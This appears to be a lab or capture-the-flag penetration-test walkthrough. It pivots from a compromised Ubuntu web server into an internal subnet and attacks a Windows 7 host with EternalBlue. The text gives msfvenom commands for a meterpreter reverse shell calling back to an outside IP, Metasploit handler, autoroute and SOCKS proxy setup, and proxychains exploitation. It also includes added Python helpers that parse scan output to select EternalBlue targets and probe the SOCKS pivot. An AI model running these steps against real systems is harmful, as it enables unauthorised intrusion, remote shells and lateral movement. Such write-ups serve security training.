First a scan, which turned up password.txt.

Next there is an RCE. fscan is brought onto the box and run, and two IPs turn up:

172.26.21.50: Windows
172.26.21.60: the externally reachable Ubuntu web server

172.26.21.60:22 open
172.26.21.50:80 open
172.26.21.50:445 open
172.26.21.50:139 open
172.26.21.50:135 open
172.26.21.60:7777 open
172.26.21.60:9091 open
172.26.21.60:9090 open
172.26.21.60:7070 open
[*] WebTitle: http://172.26.21.50 code:200 len:689 title:IIS7
[+] 172.26.21.50 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://172.26.21.60:7070 code:200 len:223 title:Openfire HTTP Binding Service
[*] WebTitle: http://172.26.21.60:9090 code:200 len:115 title:None
[+] 172.26.21.50 has DOUBLEPULSAR SMB IMPLANT
[*] WebTitle: https://172.26.21.60:9091 code:200 len:115 title:None
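As an added example (not part of the original writeup), a small Python parser for fscan output of the shape shown above: it groups open ports, WebTitle lines and [+] findings per host, picks out the SMB hosts carrying an MS17-010 finding (the candidates for ms17_010_eternalblue through the pivot), and derives the /24 to hand to autoroute. The sample text is constructed to mirror the lines above; real fscan output has more line types than these three, which the parser simply ignores.

```python
"""Turn fscan console output into a per-host summary (added example, not from the writeup)."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample, same shape as the fscan lines in the writeup above.
SAMPLE = """\
172.26.21.60:22 open
172.26.21.50:80 open
172.26.21.50:445 open
172.26.21.50:139 open
172.26.21.50:135 open
172.26.21.60:7777 open
172.26.21.60:9091 open
172.26.21.60:9090 open
172.26.21.60:7070 open
[*] WebTitle: http://172.26.21.50 code:200 len:689 title:IIS7
[+] 172.26.21.50 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
[*] WebTitle: http://172.26.21.60:7070 code:200 len:223 title:Openfire HTTP Binding Service
[*] WebTitle: http://172.26.21.60:9090 code:200 len:115 title:None
[+] 172.26.21.50 has DOUBLEPULSAR SMB IMPLANT
[*] WebTitle: https://172.26.21.60:9091 code:200 len:115 title:None
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
# groups: 1 = url, 2 = ip, 3 = status code, 4 = length, 5 = title
TITLE_RE = re.compile(rf"^\[\*\] WebTitle: (https?://{IP}(?::\d+)?\S*) code:(\d+) len:(\d+) title:(.*)$")
# groups: 1 = ip, 2 = finding text
VULN_RE = re.compile(rf"^\[\+\] {IP}(?::\d+)? (.+)$")


def parse_fscan(text):
    """Group fscan lines by host: open ports, web titles and [+] findings.
    Lines of any other type (banners, progress, errors) are ignored."""
    hosts = defaultdict(lambda: {"ports": set(), "web": [], "vulns": []})
    for raw in text.splitlines():
        line = raw.strip()
        if m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := TITLE_RE.match(line):
            hosts[m.group(2)]["web"].append(
                {"url": m.group(1), "code": int(m.group(3)), "title": m.group(5)})
        elif m := VULN_RE.match(line):
            hosts[m.group(1)]["vulns"].append(m.group(2))
    return dict(hosts)


def smb_ms17_010_targets(hosts):
    """Hosts exposing 445 with an MS17-010 finding: the candidates for
    exploit/windows/smb/ms17_010_eternalblue through the pivot."""
    return sorted(ip for ip, h in hosts.items()
                  if 445 in h["ports"] and any("MS17-010" in v for v in h["vulns"]))


def pivot_subnets(hosts, prefix=24):
    """The subnets to add with `run autoroute -s`, one per discovered /prefix."""
    nets = {ipaddress.ip_network(f"{ip}/{prefix}", strict=False) for ip in hosts}
    return sorted(str(n) for n in nets)


if __name__ == "__main__":
    found = parse_fscan(SAMPLE)
    for ip, h in sorted(found.items()):
        print(ip, sorted(h["ports"]), [w["title"] for w in h["web"]], h["vulns"])
    print("autoroute:", pivot_subnets(found))
    print("eternalblue candidates:", smb_ms17_010_targets(found))
```

Feed it the saved fscan output (fscan's -o file or the pasted console text) instead of SAMPLE to get the same summary for a real run.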

Then:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=165.154.5.221 LPORT=9999 -f elf > shell.elf
# upload shell.elf to the compromised Linux host (the Ubuntu web server)

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 165.154.5.221
set lport 9999
run

# run the elf on the compromised Linux host; the session comes back

run get_local_subnets
# list the target's local subnets, then route the discovered one through this session
run autoroute -s 172.26.21.0/255.255.255.0
# the route is bound to a specific session: run this inside the meterpreter session,
# or set SESSION if using the post/multi/manage/autoroute module instead
run autoroute -p
# print the routing table to confirm the route is in place


# set up the SOCKS proxy that exposes the route
background
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run
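Before launching anything through the proxy, it is worth confirming that the SOCKS pivot actually reaches 172.26.21.50:445. The Python below is an added example (not from the writeup): it performs the SOCKS5 greeting and CONNECT from RFC 1928 against a proxy and reports the reply code, which is the same exchange proxychains performs on the framework's behalf; a 0x00 reply means the proxy opened the TCP connection to the target through the session route. Because it cannot reach the lab, it also carries a constructed stand-in SOCKS5 server that grants CONNECT only for a given set of (ip, port) pairs; against the real pivot, call socks5_connect("127.0.0.1", 1080, "172.26.21.50", 445) instead.

```python
"""Probe a SOCKS5 pivot with a real CONNECT before exploiting through it (added example)."""
import socket
import struct
import threading

SOCKS_VERSION, NO_AUTH, CMD_CONNECT = 0x05, 0x00, 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REPLY_TEXT = {
    0x00: "succeeded", 0x01: "general SOCKS server failure",
    0x02: "connection not allowed by ruleset", 0x03: "network unreachable",
    0x04: "host unreachable", 0x05: "connection refused", 0x06: "TTL expired",
    0x07: "command not supported", 0x08: "address type not supported",
}


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; SOCKS messages are fixed-layout, so a short read is an error."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection mid-message")
        buf += chunk
    return buf


def socks5_connect(proxy_host, proxy_port, target_ip, target_port, timeout=5.0):
    """Greeting + CONNECT through the proxy (RFC 1928, no authentication).
    Returns (reply_code, description); code 0 means the proxy reached target_ip:target_port,
    i.e. the route through the pivot works for that host and port."""
    with socket.create_connection((proxy_host, proxy_port), timeout=timeout) as s:
        s.sendall(bytes([SOCKS_VERSION, 1, NO_AUTH]))          # VER NMETHODS METHODS
        ver, method = _recv_exact(s, 2)                        # VER METHOD
        if ver != SOCKS_VERSION or method != NO_AUTH:
            return None, f"proxy refused no-auth (ver={ver}, method={method:#04x})"
        req = struct.pack("!BBBB", SOCKS_VERSION, CMD_CONNECT, 0x00, ATYP_IPV4)
        req += socket.inet_aton(target_ip) + struct.pack("!H", target_port)
        s.sendall(req)                                         # VER CMD RSV ATYP DST.ADDR DST.PORT
        ver, rep, _rsv, atyp = _recv_exact(s, 4)               # VER REP RSV ATYP
        if atyp == ATYP_IPV4:                                  # drain BND.ADDR + BND.PORT
            _recv_exact(s, 4 + 2)
        elif atyp == ATYP_DOMAIN:
            _recv_exact(s, _recv_exact(s, 1)[0] + 2)
        elif atyp == ATYP_IPV6:
            _recv_exact(s, 16 + 2)
        return rep, REPLY_TEXT.get(rep, f"unknown reply {rep:#04x}")


def start_fake_socks5(reachable):
    """Constructed stand-in for the msf socks_proxy so the probe runs offline: grants CONNECT
    only for (ip, port) pairs in `reachable`, answers 'host unreachable' otherwise.
    Returns the (host, port) it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def handle(conn):
        with conn:
            _ver, nmethods = _recv_exact(conn, 2)
            _recv_exact(conn, nmethods)
            conn.sendall(bytes([SOCKS_VERSION, NO_AUTH]))
            _ver, cmd, _rsv, atyp = _recv_exact(conn, 4)
            if cmd != CMD_CONNECT:
                rep = 0x07
            elif atyp != ATYP_IPV4:
                rep = 0x08
            else:
                ip = socket.inet_ntoa(_recv_exact(conn, 4))
                port = struct.unpack("!H", _recv_exact(conn, 2))[0]
                rep = 0x00 if (ip, port) in reachable else 0x04
            # Reply with a zeroed IPv4 BND.ADDR/BND.PORT; a real proxy would now start relaying.
            conn.sendall(struct.pack("!BBBB", SOCKS_VERSION, rep, 0x00, ATYP_IPV4) + bytes(6))

    def serve():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    # Offline demo against the stand-in; against the real pivot use ("127.0.0.1", 1080).
    host, port = start_fake_socks5({("172.26.21.50", 445)})
    print("172.26.21.50:445  ->", socks5_connect(host, port, "172.26.21.50", 445))
    print("172.26.21.50:3389 ->", socks5_connect(host, port, "172.26.21.50", 3389))
```

A non-zero reply from the real socks_proxy listener points at the route or the session rather than at the exploit module, which is the distinction to make before spending time on payload options.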

Open another terminal and use proxychains4 (p4). The proxychains config (/etc/proxychains4.conf) has to point at the same listener, i.e. a socks5 127.0.0.1 1080 entry, with the socks type matching the module's VERSION option (5 by default).

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.26.21.50
exploit

And then, congratulations: it does not connect. Note that the route autoroute added lives in the first msfconsole instance, so exploit modules can also be launched from there directly against 172.26.21.50, without a second proxychained msfconsole.

Back to the session:

sessions
sessions -i id
# replace id with the session number listed by `sessions`